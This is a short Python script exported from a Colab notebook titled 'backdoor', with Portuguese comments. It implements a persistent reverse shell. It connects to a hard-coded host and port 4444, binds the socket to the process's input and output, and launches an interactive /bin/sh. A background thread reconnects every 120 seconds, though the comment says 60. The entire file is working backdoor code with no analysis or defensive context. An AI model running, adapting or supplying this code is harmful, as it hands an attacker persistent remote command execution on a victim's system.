# -*- coding: utf-8 -*-
"""backdoor.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/1obQ_obTeaia79hwcBXsUXmWwdEwVzDK-
"""
import socket
import subprocess
import os
import threading
import time

HOST = '10.1.2.74'  # IP do seu sistema host
PORT = 4444  # Porta para conexão

def conexao_reversa():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        subprocess.call(['/bin/sh', '-i'])
        s.close()
    except Exception as e:
        print(f"Erro: {e}")
        if 's' in locals():
            s.close()

def persistencia():
    while True:
        time.sleep(120)  # Tenta reconectar a cada 60 segundos
        try:
            conexao_reversa()
        except:
            pass

def main():
    thread_persistencia = threading.Thread(target=persistencia)
    thread_persistencia.daemon = True
    thread_persistencia.start()

    conexao_reversa()

if __name__ == "__main__":
    main()
